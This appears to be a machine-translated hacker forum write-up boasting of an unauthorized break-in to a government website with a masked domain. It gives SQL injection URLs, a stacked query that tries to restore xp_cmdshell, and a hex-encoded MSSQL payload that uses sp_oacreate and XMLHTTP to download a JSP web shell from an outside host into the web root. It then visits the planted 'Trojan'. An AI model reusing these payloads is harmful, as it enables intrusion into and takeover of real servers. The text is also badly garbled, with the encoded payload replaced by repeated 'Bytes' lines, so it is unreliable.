Author: kiss
Source: Lenk Technology Alliance
Harry Potter, I don't know how many people have read it. I'm a typical Harry Potter fan. I learned from my childhood. Until the last death saint is released. The content indeed exceeds the expectation of most people. As the greatest hero. I remember that I met a girl from Lanzhou some time ago during the Harry Potter fans forum. Just a few days ago, I lost a website where he said his boyfriend was from his hometown. Out of curiosity. She wants to see where her boyfriend is. Open it. Familiar layout. I remember the layout I posted on the Forum some time ago (JSP directly Elevation of Privilege. It is also a JSP program. So I plan to test it. We can see that it is not the last command to directly escalate permissions by executing CMD.
Start, telnet www. XXXX. GOV. CN 3389 return 'Connection to the host cannot be opened, in port 3389: Connection failed' TELNET port 1433, the same does not work. So I scanned it with a X-Scan-v3.3. Only ports 21 and 80 are enabled. Depressed. It may be the Intranet. You can only start with port 80. Ah d injection tool mad scan. Figure 1. The injection still exists. I am a script boy, so all these physical skills are handed over to the tool. Figure 2 shows that the character is good. MSSQL database and SA permissions. Now let's see if xp_cmdshell has been deleted. Depressed, the character is still not the same. Directly return to the home page. Figure 3,
In this case, we are submitting:
Http://www.XXX.gov.cn/XXX/hdsq/XXXXXfo.jsp? ID = 8; EXEC master. dbo. sp_addextendedproc xp_mongoshell, xplog70.dll restored to him. Figure 4. Or not. This is a dilemma. You can check the injection points. Check the database type, check the database permissions, and what is going on. Is it filtered out. So submit http://www.XXX.gov.cn/XXX/hdsq/XXXXXfo.jsp? ID = 8; EXEC return figure 4,
Submit http://www.XXX.gov.cn/XXX/hdsq/XXXXXfo.jsp? ID = 8; EXEC figure 5. Return directly to the homepage. However, it may take a long time for JSP backup to take SHELL, and it may be managed. Wait
N long after .....
JSP backup elevation relies on the downloaded SHELL, which cannot be downloaded directly using SQL statements in IE .. Haha. I am so talented. The next step is the column directory, but the problem arises. James cannot. Ah, D can figure 6. It seems that the tool cannot only trust one type.
After a while, I finally learned that the web directory is under d: javaTomcat 5.5web1_xxx. Now we should use the SQL statement to download it directly (cainiao reminds you to save a jsp to be changed to. Zip or. RAR format, otherwise .......)
Next, submit it in IE (Figure 7 ):
Jsp? The http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp? ID = 8; DECLARE @ s varchar (4000); SET @ S = CAST (Broadcast
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
C776562617070735C7178777A5C312E6A73705D2C31203B2D2D as varchar (4000); EXEC (@ S );--
Above
DECLARE @ s varchar (4000); SET @ S = CAST (Broadcast
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
03B2D2D as varchar (4000); EXEC (@ S );--
It is EXEC-encoded.
The encoded SQL statement is as follows:
DECLARE
@ B varbinary (8000 ),
@ Hr int,
@ Http INT,
@ Down INT
EXEC sp_oacreate [Microsoft. XMLHTTP], @ http output
EXEC @ hr = sp_oamethod @ http, [Open], null, [GET], http://topfocus.3322.org/jsp.zip,, 0
EXEC @ hr = sp_oamethod @ http, [Send], null
EXEC @ hr = sp_OAGetProperty @ http, [responseBody], @ B output
EXEC @ hr = sp_oacreate [ADODB. Stream], @ down output
EXEC @ hr = sp_OASetProperty @ down, [Type], 1
EXEC @ hr = sp_OASetProperty @ down, [mode], 3
EXEC @ hr = sp_oamethod @ down, [Open], null
EXEC @ hr = sp_oamethod @ down, [Write], null, @ B
EXEC @ hr = sp_oamethod @ down, [SaveToFile], null, [d: javaTomcat 5.5web#xxxx1.jsp], 1 ;--
Next, visit http://www.xxx.gov.cn/xxx/1.jspfig 8.
It's time for happiness... The next step is to submit the customer service provider with Jsp... Figure 9
Visit our Trojan .. Http://www.xxx.gov.cn/xxx/tops-files.jspfigure 10
Because GOV's site. All sensitive information has been processed...
Thanks to Lenk for your guidance ....
The idea is not clear. Let's take a look ..